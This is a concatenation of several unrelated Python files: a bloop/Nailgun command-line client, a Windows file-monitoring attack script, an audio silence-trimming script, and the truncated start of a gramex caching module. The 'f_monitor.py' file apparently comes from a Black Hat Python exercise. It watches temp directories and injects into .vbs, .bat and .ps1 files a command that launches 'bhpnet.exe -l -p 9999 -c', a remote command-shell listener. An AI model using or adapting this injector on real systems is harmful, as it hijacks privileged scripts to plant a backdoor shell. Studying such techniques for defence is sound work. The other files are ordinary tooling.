ctypes.POINTER(OVERLAPPED),
]
WriteFile.restype = wintypes.BOOL
GetLastError = ctypes.windll.kernel32.GetLastError
GetLastError.argtypes = []
GetLastError.restype = wintypes.DWORD
SetLastError = ctypes.windll.kernel32.SetLastError
SetLastError.argtypes = [wintypes.DWORD]
SetLastError.restype = None
FormatMessage = ctypes.windll.kernel32.FormatMessageW
FormatMessage.argtypes = [
wintypes.DWORD,
wintypes.LPVOID,
wintypes.DWORD,
wintypes.DWORD,
ctypes.POINTER(wintypes.LPCWSTR),
wintypes.DWORD,
wintypes.LPVOID,
]
FormatMessage.restype = wintypes.DWORD
LocalFree = ctypes.windll.kernel32.LocalFree
GetOverlappedResult = ctypes.windll.kernel32.GetOverlappedResult
GetOverlappedResult.argtypes = [
wintypes.HANDLE,
ctypes.POINTER(OVERLAPPED),
LPDWORD,
wintypes.BOOL,
]
GetOverlappedResult.restype = wintypes.BOOL
CreateEvent = ctypes.windll.kernel32.CreateEventW
CreateEvent.argtypes = [LPDWORD, wintypes.BOOL, wintypes.BOOL, wintypes.LPCWSTR]
CreateEvent.restype = wintypes.HANDLE
PeekNamedPipe = ctypes.windll.kernel32.PeekNamedPipe
PeekNamedPipe.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
LPDWORD,
LPDWORD,
]
PeekNamedPipe.restype = wintypes.BOOL
WaitNamedPipe = ctypes.windll.kernel32.WaitNamedPipeW
WaitNamedPipe.argtypes = [wintypes.LPCWSTR, wintypes.DWORD]
WaitNamedPipe.restype = wintypes.BOOL
def _win32_strerror(err):
""" expand a win32 error code into a human readable message """
# FormatMessage will allocate memory and assign it here
buf = ctypes.c_wchar_p()
FormatMessage(
FORMAT_MESSAGE_FROM_SYSTEM
| FORMAT_MESSAGE_ALLOCATE_BUFFER
| FORMAT_MESSAGE_IGNORE_INSERTS,
None,
err,
0,
buf,
0,
None,
)
try:
return buf.value
finally:
LocalFree(buf)
class WindowsNamedPipeTransport(Transport):
""" connect to a named pipe """
def __init__(self, sockpath):
self.sockpath = u"\\\\.\\pipe\\{0}".format(sockpath)
while True:
self.pipe = CreateFile(
self.sockpath,
GENERIC_READ | GENERIC_WRITE,
0,
None,
OPEN_EXISTING,
FILE_FLAG_OVERLAPPED,
None,
)
err1 = GetLastError()
msg = _win32_strerror(err1)
if self.pipe != INVALID_HANDLE_VALUE:
break
if err1 != ERROR_PIPE_BUSY:
self.pipe = None
raise NailgunException(msg, NailgunException.CONNECT_FAILED)
if not WaitNamedPipe(self.sockpath, 5000):
self.pipe = None
raise NailgunException(
"time out while waiting for a pipe", NailgunException.CONNECT_FAILED
)
# event for the overlapped I/O operations
self.read_waitable = CreateEvent(None, True, False, None)
if self.read_waitable is None:
raise NailgunException(
"CreateEvent failed", NailgunException.CONNECT_FAILED
)
self.write_waitable = CreateEvent(None, True, False, None)
if self.write_waitable is None:
raise NailgunException(
"CreateEvent failed", NailgunException.CONNECT_FAILED
)
def _raise_win_err(self, msg, err):
raise IOError("%s win32 error code: %d %s" % (msg, err, _win32_strerror(err)))
def close(self):
if self.pipe:
CloseHandle(self.pipe)
self.pipe = None
if self.read_waitable is not None:
CloseHandle(self.read_waitable)
self.read_waitable = None
if self.write_waitable is not None:
CloseHandle(self.write_waitable)
self.write_waitable = None
def recv_into(self, buffer, nbytes):
# we don't use memoryview because OVERLAPPED I/O happens
# after the method (ReadFile) returns
buf = ctypes.create_string_buffer(nbytes)
olap = OVERLAPPED()
olap.hEvent = self.read_waitable
immediate = ReadFile(self.pipe, buf, nbytes, None, olap)
if not immediate:
err = GetLastError()
if err != ERROR_IO_PENDING:
self._raise_win_err("failed to read %d bytes" % nbytes, GetLastError())
nread = wintypes.DWORD()
if not GetOverlappedResult(self.pipe, olap, nread, True):
err = GetLastError()
self._raise_win_err("error while waiting for read", err)
nread = nread.value
buffer[:nread] = buf[:nread]
return nread
def sendall(self, data):
olap = OVERLAPPED()
olap.hEvent = self.write_waitable
p = (ctypes.c_ubyte * len(data))(*(bytearray(data)))
immediate = WriteFile(self.pipe, p, len(data), None, olap)
if not immediate:
err = GetLastError()
if err != ERROR_IO_PENDING:
self._raise_win_err(
"failed to write %d bytes" % len(data), GetLastError()
)
# Obtain results, waiting if needed
nwrote = wintypes.DWORD()
if not GetOverlappedResult(self.pipe, olap, nwrote, True):
err = GetLastError()
self._raise_win_err("error while waiting for write", err)
nwrote = nwrote.value
if nwrote != len(data):
raise IOError("Async wrote less bytes!")
return nwrote
def select(self, timeout_secs):
start = monotonic_time_nanos()
timeout_nanos = timeout_secs * NSEC_PER_SEC
while True:
readable, exceptional = self.select_now()
if (
readable
or exceptional
or monotonic_time_nanos() - start > timeout_nanos
):
return readable, exceptional
def select_now(self):
available_total = wintypes.DWORD()
exceptional = not PeekNamedPipe(self.pipe, None, 0, None, available_total, None)
readable = available_total.value > 0
result = readable, exceptional
return result
class NailgunConnection(object):
"""Stateful object holding the connection to the Nailgun server."""
def __init__(
self,
server_name,
server_port=None,
stdin=sys.stdin,
stdout=sys.stdout,
stderr=sys.stderr,
cwd=None,
heartbeat_interval_sec=DEFAULT_HEARTBEAT_INTERVAL_SEC,
):
self.transport = make_nailgun_transport(server_name, server_port, cwd)
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.recv_flags = 0
self.send_flags = 0
self.header_buf = ctypes.create_string_buffer(CHUNK_HEADER_LEN)
self.buf = ctypes.create_string_buffer(BUFSIZE)
self.exit_code = None
self.shutdown_event = Event()
self.error_lock = RLock()
self.error = None
self.error_traceback = None
self.stdin_condition = Condition()
self.stdin_thread = Thread(target=stdin_thread_main, args=(self,))
self.stdin_thread.daemon = True
self.send_queue = Queue.Queue()
self.send_condition = Condition()
self.send_thread = Thread(target=send_thread_main, args=(self,))
self.send_thread.daemon = True
self.heartbeat_interval_sec = heartbeat_interval_sec
self.heartbeat_condition = Condition()
self.heartbeat_thread = None
if heartbeat_interval_sec > 0:
self.heartbeat_thread = Thread(target=heartbeat_thread_main, args=(self,))
self.heartbeat_thread.daemon = True
def send_command(
self, cmd, cmd_args=[], filearg=None, env=os.environ, cwd=os.getcwd()
):
"""
Sends the command and environment to the nailgun server, then loops forever
reading the response until the server sends an exit chunk.
Returns the exit value, or raises NailgunException on error.
"""
try:
return self._send_command_and_read_response(
cmd, cmd_args, filearg, env, cwd
)
except socket.error as e:
re_raise(
NailgunException(
"Server disconnected unexpectedly: {0}".format(e),
NailgunException.CONNECTION_BROKEN,
)
)
def _send_command_and_read_response(self, cmd, cmd_args, filearg, env, cwd):
self.stdin_thread.start()
self.send_thread.start()
try:
if filearg:
self._send_file_arg(filearg)
for cmd_arg in cmd_args:
self._send_chunk(cmd_arg, CHUNKTYPE_ARG)
self._send_env_var("NAILGUN_FILESEPARATOR", os.sep)
self._send_env_var("NAILGUN_PATHSEPARATOR", os.pathsep)
self._send_tty_format(self.stdin)
self._send_tty_format(self.stdout)
self._send_tty_format(self.stderr)
for k, v in env.items():
self._send_env_var(k, v)
self._send_chunk(cwd, CHUNKTYPE_DIR)
self._send_chunk(cmd, CHUNKTYPE_CMD)
if self.heartbeat_thread is not None:
self.heartbeat_thread.start()
while self.exit_code is None:
self._process_next_chunk()
finally:
self.shutdown_event.set()
with self.stdin_condition:
self.stdin_condition.notify()
with self.send_condition:
self.send_condition.notify()
if self.heartbeat_thread is not None:
with self.heartbeat_condition:
self.heartbeat_condition.notify()
self.heartbeat_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
self.stdin_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
self.send_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
return self.exit_code
def _process_next_chunk(self):
"""
Processes the next chunk from the nailgun server.
"""
readable, exceptional = self.transport.select(SELECT_MAX_BLOCK_TIME_SEC)
if readable:
self._process_nailgun_stream()
if exceptional:
raise NailgunException(
"Server disconnected in select", NailgunException.CONNECTION_BROKEN
)
# if daemon thread threw, rethrow here
if self.shutdown_event.is_set():
e = None
e_tb = None
with self.error_lock:
e = self.error
e_tb = self.error_traceback
if e is not None:
re_raise(e, e_tb)
def _send_chunk(self, buf, chunk_type):
"""
Send chunk to the server asynchronously
"""
self.send_queue.put((chunk_type, buf))
with self.send_condition:
self.send_condition.notify()
def _send_env_var(self, name, value):
"""
Sends an environment variable in KEY=VALUE format.
"""
self._send_chunk("=".join((name, value)), CHUNKTYPE_ENV)
def _send_tty_format(self, f):
"""
Sends a NAILGUN_TTY_# environment variable.
"""
if not f or not hasattr(f, "fileno"):
return
try:
fileno = f.fileno()
isatty = os.isatty(fileno)
self._send_env_var("NAILGUN_TTY_" + str(fileno), str(int(isatty)))
except UnsupportedOperation:
return
def _send_file_arg(self, filename):
"""
Sends the contents of a file to the server.
"""
with open(filename) as f:
while True:
num_bytes = f.readinto(self.buf)
if not num_bytes:
break
self._send_chunk(self.buf.raw[:num_bytes], CHUNKTYPE_LONGARG)
def _recv_to_fd(self, dest_file, num_bytes):
"""
Receives num_bytes bytes from the nailgun socket and copies them to the specified file
object. Used to route data to stdout or stderr on the client.
"""
bytes_read = 0
while bytes_read < num_bytes:
bytes_to_read = min(len(self.buf), num_bytes - bytes_read)
bytes_received = self.transport.recv_into(self.buf, bytes_to_read)
if dest_file:
dest_file.write(bytes_to_str(self.buf[:bytes_received]))
dest_file.flush()
bytes_read += bytes_received
def _recv_to_buffer(self, num_bytes, buf):
"""
Receives num_bytes from the nailgun socket and writes them into the specified buffer.
"""
# We'd love to use socket.recv_into() everywhere to avoid
# unnecessary copies, but we need to support Python 2.6. The
# only way to provide an offset to recv_into() is to use
# memoryview(), which doesn't exist until Python 2.7.
if HAS_MEMORYVIEW:
self._recv_into_memoryview(num_bytes, memoryview(buf))
else:
self._recv_to_buffer_with_copy(num_bytes, buf)
def _recv_into_memoryview(self, num_bytes, buf_view):
"""
Receives num_bytes from the nailgun socket and writes them into the specified memoryview
to avoid an extra copy.
"""
bytes_read = 0
while bytes_read < num_bytes:
bytes_received = self.transport.recv_into(
buf_view[bytes_read:], num_bytes - bytes_read
)
if not bytes_received:
raise NailgunException(
"Server unexpectedly disconnected in recv_into()",
NailgunException.CONNECTION_BROKEN,
)
bytes_read += bytes_received
def _recv_to_buffer_with_copy(self, num_bytes, buf):
"""
Receives num_bytes from the nailgun socket and writes them into the specified buffer.
"""
bytes_read = 0
while bytes_read < num_bytes:
recv_buf = self.transport.recv(num_bytes - bytes_read)
if not len(recv_buf):
raise NailgunException(
"Server unexpectedly disconnected in recv()",
NailgunException.CONNECTION_BROKEN,
)
buf[bytes_read : bytes_read + len(recv_buf)] = recv_buf
bytes_read += len(recv_buf)
def _process_exit(self, exit_len):
"""
Receives an exit code from the nailgun server and sets nailgun_connection.exit_code
to indicate the client should exit.
"""
num_bytes = min(len(self.buf), exit_len)
self._recv_to_buffer(num_bytes, self.buf)
self.exit_code = int(self.buf.raw[:num_bytes])
def _send_heartbeat(self):
"""
Sends a heartbeat to the nailgun server to indicate the client is still alive.
"""
self._send_chunk("", CHUNKTYPE_HEARTBEAT)
def _process_nailgun_stream(self):
"""
Processes a single chunk from the nailgun server.
"""
self._recv_to_buffer(len(self.header_buf), self.header_buf)
(chunk_len, chunk_type) = struct.unpack_from(">ic", self.header_buf.raw)
if chunk_type == CHUNKTYPE_STDOUT:
self._recv_to_fd(self.stdout, chunk_len)
elif chunk_type == CHUNKTYPE_STDERR:
self._recv_to_fd(self.stderr, chunk_len)
elif chunk_type == CHUNKTYPE_EXIT:
self._process_exit(chunk_len)
elif chunk_type == CHUNKTYPE_SENDINPUT:
# signal stdin thread to get and send more data
with self.stdin_condition:
self.stdin_condition.notify()
else:
raise NailgunException(
"Unexpected chunk type: {0}".format(chunk_type),
NailgunException.UNEXPECTED_CHUNKTYPE,
)
def wait_termination(self, timeout):
"""
Wait for shutdown event to be signalled within specified interval
Return True if termination was signalled, False otherwise
"""
wait_time = timeout
start = monotonic_time_nanos()
with self.send_condition:
while True:
if self.shutdown_event.is_set():
return True
self.send_condition.wait(wait_time)
elapsed = (monotonic_time_nanos() - start) * 1.0 / NSEC_PER_SEC
wait_time = timeout - elapsed
if wait_time <= 0:
return False
return False
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
try:
self.transport.close()
except socket.error:
pass
def monotonic_time_nanos():
"""Returns a monotonically-increasing timestamp value in nanoseconds.
The epoch of the return value is undefined. To use this, you must call
it more than once and calculate the delta between two calls.
"""
# This function should be overwritten below on supported platforms.
raise Exception("Unsupported platform: " + platform.system())
if platform.system() == "Linux":
# From <linux/time.h>, available since 2.6.28 (released 24-Dec-2008).
CLOCK_MONOTONIC_RAW = 4
librt = ctypes.CDLL("librt.so.1", use_errno=True)
clock_gettime = librt.clock_gettime
class struct_timespec(ctypes.Structure):
_fields_ = [("tv_sec", ctypes.c_long), ("tv_nsec", ctypes.c_long)]
clock_gettime.argtypes = [ctypes.c_int, ctypes.POINTER(struct_timespec)]
def _monotonic_time_nanos_linux():
t = struct_timespec()
clock_gettime(CLOCK_MONOTONIC_RAW, ctypes.byref(t))
return t.tv_sec * NSEC_PER_SEC + t.tv_nsec
monotonic_time_nanos = _monotonic_time_nanos_linux
elif platform.system() == "Darwin":
# From <mach/mach_time.h>
KERN_SUCCESS = 0
libSystem = ctypes.CDLL("/usr/lib/libSystem.dylib", use_errno=True)
mach_timebase_info = libSystem.mach_timebase_info
class struct_mach_timebase_info(ctypes.Structure):
_fields_ = [("numer", ctypes.c_uint32), ("denom", ctypes.c_uint32)]
mach_timebase_info.argtypes = [ctypes.POINTER(struct_mach_timebase_info)]
mach_ti = struct_mach_timebase_info()
ret = mach_timebase_info(ctypes.byref(mach_ti))
if ret != KERN_SUCCESS:
raise Exception("Could not get mach_timebase_info, error: " + str(ret))
mach_absolute_time = libSystem.mach_absolute_time
mach_absolute_time.restype = ctypes.c_uint64
def _monotonic_time_nanos_darwin():
return (mach_absolute_time() * mach_ti.numer) / mach_ti.denom
monotonic_time_nanos = _monotonic_time_nanos_darwin
elif platform.system() == "Windows":
# From <Winbase.h>
perf_frequency = ctypes.c_uint64()
ctypes.windll.kernel32.QueryPerformanceFrequency(ctypes.byref(perf_frequency))
def _monotonic_time_nanos_windows():
perf_counter = ctypes.c_uint64()
ctypes.windll.kernel32.QueryPerformanceCounter(ctypes.byref(perf_counter))
return perf_counter.value * NSEC_PER_SEC / perf_frequency.value
monotonic_time_nanos = _monotonic_time_nanos_windows
elif sys.platform == "cygwin":
try:
k32 = ctypes.CDLL("Kernel32", use_errno=True)
except OSError:
k32 = ctypes.CDLL("Kernel32.dll", use_errno=True)
perf_frequency = ctypes.c_uint64()
k32.QueryPerformanceFrequency(ctypes.byref(perf_frequency))
def _monotonic_time_nanos_cygwin():
perf_counter = ctypes.c_uint64()
k32.QueryPerformanceCounter(ctypes.byref(perf_counter))
return perf_counter.value * NSEC_PER_SEC / perf_frequency.value
monotonic_time_nanos = _monotonic_time_nanos_cygwin
def send_thread_main(conn):
"""
Sending thread worker function
Waits for data and transmits it to server
"""
try:
header_buf = ctypes.create_string_buffer(CHUNK_HEADER_LEN)
while True:
connection_error = None
while not conn.send_queue.empty():
# only this thread can deplete the queue, so it is safe to use blocking get()
(chunk_type, buf) = conn.send_queue.get()
bbuf = to_bytes(buf)
byte_count=len(bbuf)
struct.pack_into(">ic", header_buf, 0, byte_count, chunk_type)
# these chunk types are not required for server to accept and process and server may terminate
# any time without waiting for them
is_required = chunk_type not in (
CHUNKTYPE_HEARTBEAT,
CHUNKTYPE_STDIN,
CHUNKTYPE_STDIN_EOF,
)
try:
conn.transport.sendall(header_buf.raw)
conn.transport.sendall(bbuf)
except socket.error as e:
# The server may send termination signal and close the socket immediately; attempt to write
# to such a socket (i.e. heartbeats) results in an error (SIGPIPE)
# Nailgun protocol is not duplex so the server does not wait on client to acknowledge
# We catch an exception and ignore it if termination has happened shortly afterwards
if not is_required and conn.wait_termination(
SEND_THREAD_WAIT_TERMINATION_SEC
):
return
raise
with conn.send_condition:
if conn.shutdown_event.is_set():
return
if not conn.send_queue.empty():
continue
conn.send_condition.wait()
if conn.shutdown_event.is_set():
return
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
def stdin_thread_main(conn):
"""
Stdin thread reading worker function
If stdin is available, read it to internal buffer and send to server
"""
try:
eof = False
while True:
# wait for signal to read new line from stdin or shutdown
# we do not start reading from stdin before server actually requests that
with conn.stdin_condition:
if conn.shutdown_event.is_set():
return
conn.stdin_condition.wait()
if conn.shutdown_event.is_set():
return
if not conn.stdin or eof:
conn._send_chunk(buf, CHUNKTYPE_STDIN_EOF)
continue
buf = conn.stdin.readline()
if buf == "":
eof = True
conn._send_chunk(buf, CHUNKTYPE_STDIN_EOF)
continue
conn._send_chunk(buf, CHUNKTYPE_STDIN)
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
def heartbeat_thread_main(conn):
"""
Heartbeat thread worker function
Periodically sends heartbeats to server as long as command is running
"""
try:
while True:
with conn.heartbeat_condition:
if conn.shutdown_event.is_set():
return
conn.heartbeat_condition.wait(conn.heartbeat_interval_sec)
if conn.shutdown_event.is_set():
return
conn._send_heartbeat()
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
def make_nailgun_transport(nailgun_server, nailgun_port=None, cwd=None):
"""
Creates and returns a socket connection to the nailgun server.
"""
transport = None
if nailgun_server.startswith("local:"):
if platform.system() == "Windows":
pipe_addr = nailgun_server[6:]
transport = WindowsNamedPipeTransport(pipe_addr)
else:
try:
s = socket.socket(socket.AF_UNIX)
except socket.error as msg:
re_raise(
NailgunException(
"Could not create local socket connection to server: {0}".format(
msg
),
NailgunException.SOCKET_FAILED,
)
)
socket_addr = nailgun_server[6:]
prev_cwd = os.getcwd()
try:
if cwd is not None:
os.chdir(cwd)
s.connect(socket_addr)
transport = UnixTransport(s)
except socket.error as msg:
re_raise(
NailgunException(
"Could not connect to local server at {0}: {1}".format(
socket_addr, msg
),
NailgunException.CONNECT_FAILED,
)
)
finally:
if cwd is not None:
os.chdir(prev_cwd)
else:
socket_addr = nailgun_server
socket_family = socket.AF_UNSPEC
for (af, socktype, proto, _, sa) in socket.getaddrinfo(
nailgun_server, nailgun_port, socket.AF_UNSPEC, socket.SOCK_STREAM
):
try:
s = socket.socket(af, socktype, proto)
except socket.error as msg:
s = None
continue
try:
s.connect(sa)
transport = UnixTransport(s)
except socket.error as msg:
s.close()
s = None
continue
break
if transport is None:
raise NailgunException(
"Could not connect to server {0}:{1}".format(nailgun_server, nailgun_port),
NailgunException.CONNECT_FAILED,
)
return transport
if is_py2:
exec(
'''
def re_raise(ex, ex_trace = None):
"""
Throw ex and preserve stack trace of original exception if we run on Python 2
"""
if ex_trace is None:
ex_trace = sys.exc_info()[2]
raise ex, None, ex_trace
'''
)
else:
def re_raise(ex, ex_trace=None):
"""
Throw ex and preserve stack trace of original exception if we run on Python 2
"""
raise ex
def main():
"""
Main entry point to the nailgun client.
"""
default_nailgun_server = os.environ.get("NAILGUN_SERVER", "127.0.0.1")
default_nailgun_port = int(os.environ.get("NAILGUN_PORT", NAILGUN_PORT_DEFAULT))
parser = optparse.OptionParser(add_help_option=False, usage="%prog [options] cmd arg1 arg2 ...")
# +++ a/bloop
parser.disable_interspersed_args()
# --- b/bloop
parser.add_option("--nailgun-server", default=default_nailgun_server)
parser.add_option("--nailgun-port", type="int", default=default_nailgun_port)
parser.add_option("--nailgun-filearg")
parser.add_option("--nailgun-showversion", action="store_true")
parser.add_option("--nailgun-help", action="help")
parser.add_option('-h', '--help', action='store_true', dest='help_set')
parser.add_option('--server-location', type='string', dest='server_location')
(options, args) = parser.parse_args()
if options.nailgun_showversion:
print("NailGun client version " + NAILGUN_VERSION)
if len(args):
cmd = args.pop(0)
else:
cmd = os.path.basename(sys.argv[0])
if options.help_set and not args:
cmd = "help"
cmd_args = []
else:
# Pass any remaining command line arguments to the server.
cmd_args = args
# The command we need to execute gets written
# to the --out-file parameter. If the user
# hasn't specified this we hijack it
out_file_temp = tempfile.NamedTemporaryFile()
out_file_path = out_file_temp.name
if cmd == "console":
try:
index = cmd_args.index("--out-file")
except:
index = -1
if index != -1:
out_file_path = cmd_args[index + 1]
else :
cmd_args = cmd_args + ["--out-file", out_file_path]
if cmd == "server":
nailgun_port = options.nailgun_port
try:
# Pick user-defined nailgun port after `server`
for arg in cmd_args:
if not arg.startswith("-"):
try:
nailgun_port = int(arg)
break
except ValueError:
print("Argument after `bloop server` is not a port " + str(arg) + ".")
if nailgun_port == options.nailgun_port:
print("Defaulting on nailgun port " + str(nailgun_port))
with NailgunConnection(
options.nailgun_server, server_port=nailgun_port
) as c:
print("Check if server is alive or not...")
exit_code = c.send_command("about", filearg=options.nailgun_filearg)
print("-------------------------------------------------------------------")
print("A bloop server is already running in port " + str(nailgun_port) + ".")
print("")
print(" - Do you want to spawn a bloop server in another port?")
print(" Run `bloop server $NAILGUN_PORT`.")
print(" - Do you want to kill the running server?")
print(" Run `bloop ng-stop --nailgun-port $NAILGUN_PORT` or `bloop ng-stop` for short.")
print("")
print("Questions? Reach us at https://gitter.im/scalacenter/bloop")
sys.exit(exit_code)
except NailgunException as e:
print("There is no server running at port " + str(nailgun_port))
print("Starting the bloop server... this may take a few seconds")
basedir = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0])))
server_location = os.path.join(basedir, "blp-server")
if not os.path.isfile(server_location):
if options.server_location:
server_location = options.server_location
else:
print("Bloop server could not be located in %s." % server_location)
print("Pass in the location with `--server-location` before the `server` command.")
sys.exit(1)
# Read jvm options from the .jvmopts file
jvmopts_file = os.path.join(basedir, ".jvmopts")
jvm_options_from_file = []
if os.path.isfile(jvmopts_file):
with open(jvmopts_file, "r") as jvmopts:
lines = jvmopts.read().splitlines()
for line in lines:
if line.startswith("-J"):
jvm_options_from_file.append(line)
else:
jvm_options_from_file.append("-J" + line)
try:
jvm_options_no_prefix = []
server_args = []
for jvm_arg in jvm_options_from_file:
if jvm_arg.startswith("-J"):
# Remove prefix -J from argument
jvm_options_no_prefix.append(jvm_arg[2:])
for arg in cmd_args:
if arg.startswith("-J"):
# Remove prefix -J from argument
jvm_options_no_prefix.append(arg[2:])
else:
server_args.append(arg)
# Works in Windows and installations that have a jar instead of a script
start = int(round(time.time() * 1000))
print("Running " + server_location + " as a jar...")
java_cmd = ["java"] + jvm_options_no_prefix + ["-jar", server_location] + server_args
print("Shelling out with '" + str(java_cmd) + "' ...")
check_call(java_cmd)
except CalledProcessError as e:
# Works in systems such as Mac OS or Nix that in which blp-server is a script
end = int(round(time.time() * 1000))
diff = start - end
if diff > 15000:
print("Skipping second attempt, previous command invocation took longer than 15s")
else:
try:
jvm_options_with_prefix = [ "-J" + opt for opt in jvm_options_no_prefix ]
print("Running " + server_location + " as a script...")
if platform.system() == "Windows":
cmd = ["cmd.exe", "/C", server_location] + cmd_args + jvm_options_with_prefix
print("Shelling out in Windows with " + str(cmd))
check_call(cmd)
else:
cmd = ["sh", server_location] + cmd_args + jvm_options_with_prefix
print("Shelling out in Unix system with " + str(cmd))
check_call(cmd)
except CalledProcessError as e2:
print("Bloop server in %s failed to run." % server_location)
print("First invocation attempt: %s" % e.cmd)
print("-> Return code: %d" % e.returncode)
print("Second invocation attempt: %s" % e2.cmd)
print("-> Return code: %d" % e2.returncode)
# Only use the return code of the first attempt
sys.exit(e.returncode)
except KeyboardInterrupt as e:
sys.exit(0)
try:
with NailgunConnection(
options.nailgun_server, server_port=options.nailgun_port
) as c:
if cmd == "repl":
sys.stderr.write("Did you mean `bloop console`?\n")
sys.exit(1)
exit_code = c.send_command(cmd, cmd_args, options.nailgun_filearg)
if cmd == "help":
sys.stdout.write("Type `--nailgun-help` for help on the Nailgun CLI tool.\n")
# the user might have specified a REPL to use
# we fallback to ammonite as the default one
# if none is specified
try:
repl_kind_index = cmd_args.index("--repl") + 1
repl_kind = cmd_args[repl_kind_index]
except:
repl_kind = "ammonite"
if cmd == "console" and repl_kind == "ammonite" and exit_code == 0:
with open(out_file_path, 'r') as f:
try:
repl_cmd = f.read().split(" ")
basedir = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0])))
coursier_location = os.path.join(basedir, "blp-coursier")
if (os.path.isfile(coursier_location)):
repl_cmd[0] = coursier_location
if platform.system() == "Windows":
cmd = ["cmd.exe", "/C"] + repl_cmd
# print("Running console in Windows with " + " ".join(cmd))
check_call(cmd)
else:
cmd = ["sh"] + repl_cmd
# print("Running console in Unix system with " + " ".join(cmd))
check_call(cmd)
except CalledProcessError as e:
print("Bloop console failed to run!")
print("-> Command: %s" % e.cmd)
print("-> Return code: %d" % e.returncode)
sys.exit(exit_code)
except NailgunException as e:
sys.stderr.write(str(e))
if "Could not connect to" in str(e):
sys.stderr.write("\n\n")
sys.stderr.write("Have you forgotten to start bloop's server? Run it with `bloop server`.\n")
sys.stderr.write("Check our usage instructions in https://scalacenter.github.io/bloop/\n")
if cmd == "help":
sys.stdout.write("Type `--nailgun-help` for help on the Nailgun CLI tool.\n")
sys.exit(e.code)
except KeyboardInterrupt as e:
pass
if __name__ == "__main__":
main()
|
f_monitor.py
|
'''
Tested on python3
About : File Moitor
pre-req : pywin32 wmi(http://sourceforge.net/projects/pywin32/)
common set of vulnerabilities(http://www.nostarch.com/blackhatpython/ http://www.nostarch.com/blackhatpython/)
'''
import tempfile
import threading
import win32file
import win32con
import os
#tmp file directory
monitor_temp_dir = ["C:\\WINDOWS\\Temp",tempfile.gettempdir()]
#constants
FILE_CREATED = 1
FILE_DELETED = 2
FILE_MODIFIED = 3
FILE_RENAMED_FROM = 4
FILE_RENAMED_TO = 5
types_of_files = {}
command = "C:\\WINDOWS\\TEMP\\bhpnet.exe -l -p 9999 -c"
types_of_files['.vbs'] = ["\r\n'bhpmarker\r\n","\r\nCreateObject(\"Wscript.Shell\").Run(\"%s\")\r\n" % command]
types_of_files['.bat'] = ["\r\nREM bhpmarker\r\n","\r\n%s\r\n" % command]
types_of_files['.ps1'] = ["\r\n#bhpmarker","Start-Process \"%s\"\r\n" % command]
def inject_code(full_filename,extension,contents):
#check if marker is ready
if types_of_files[extension][0] in contents:
return
#if no marker
full_contents = types_of_files[extension][0]
full_contents += types_of_files[extension][1]
full_contents += contents
with open(full_filename,"wb") as fd:
fd.write(full_contents)
print("[\o/] Injected code.")
return
def start_monitor(path_to_watch):
#thread
FILE_LIST_DIRECTORY = 0x0001
h_directory = win32file.CreateFile(
path_to_watch,
FILE_LIST_DIRECTORY,
win32con.FILE_SHARE_READ | win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE,
None,
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS,
None
)
while True:
try:
results = win32file.ReadDirectoryChangesW(
h_directory,
1024,
True,
win32con.FILE_NOTIFY_CHANGE_FILE_NAME |
win32con.FILE_NOTIFY_CHANGE_DIR_NAME |
win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES |
win32con.FILE_NOTIFY_CHANGE_SIZE |
win32con.FILE_NOTIFY_CHANGE_LAST_WRITE |
win32con.FILE_NOTIFY_CHANGE_SECURITY,
None,
None
)
for action,file_name in results:
full_filename = os.path.join(path_to_watch, file_name)
if action == FILE_CREATED:
print("Created %s" % full_filename)
elif action == FILE_DELETED:
print("Deleted %s" % full_filename)
elif action == FILE_MODIFIED:
print("Modified %s" % full_filename)
print("Dumping contents...")
try:
with open(full_filename,"rb") as fd:
contents = fd.read()
print(contents)
print("Dump conplete.")
except Exception as e:
print("Failed.")
print(e)
filename,extension = os.path.splitext(full_filename)
if extension in types_of_files:
inject_code(full_filename,extension,contents)
elif action == FILE_RENAME_FROM:
print("Renamed from: %s" % full_filename)
elif action == FILE_RENAMED_TO:
print("Renamed to: %s" % full_filename)
else:
print("Unknown: %s" % full_filename)
except Exception as e:
print(e)
for path in monitor_temp_dir:
monitor_thread = threading.Thread(target=start_monitor,args=(path,))
print("Spawning monitoring thread for path: %s" % path)
monitor_thread.start()
#Reference: http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.html
|
remove_silence.py
|
import librosa
import tensorflow as tf
from tqdm import tqdm
from glob import glob
from threading import Thread
FLAGS = tf.compat.v1.flags.FLAGS
def remove_silence(file, bar):
y, sr = librosa.load(file)
yt, index = librosa.effects.trim(y, top_db=10)
librosa.output.write_wav(file, yt, sr)
bar.update(1)
def main(_):
data_dir = FLAGS.data_dir
files = glob(data_dir + "/*.wav")
threads = []
with tqdm(total=len(files)) as bar:
for file in files:
thread = Thread(target=remove_silence, args=(file, bar,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
tf.compat.v1.flags.DEFINE_string("data_dir", "data dir", "data directory")
tf.compat.v1.app.run()
|
cache.py
|
'''Caching utilities'''
import io
import os
import re
import six
import sys
import json
import time
import atexit
import inspect
import requests
import tempfile
import mimetypes
import subprocess # nosec
import pandas as pd
import tornado.template
from lxml import etree
from threading import Thread
from six.moves.queue import Queue
from orderedattrdict import AttrDict
from tornado.concurrent import Future
from tornado.ioloop import IOLoop, PeriodicCallback
from gramex.config import app_log, merge, used_kwargs, CustomJSONDecoder, CustomJSONEncoder
from gramex.config import PathConfig
from six.moves.urllib_parse import urlparse
_undef = object()
MILLISECOND = 0.001 # in seconds
_opener_defaults = dict(mode='r', buffering=-1, encoding='utf-8', errors='strict',
newline=None, closefd=True)
_markdown_defaults = dict(output_format='html5', extensions=[
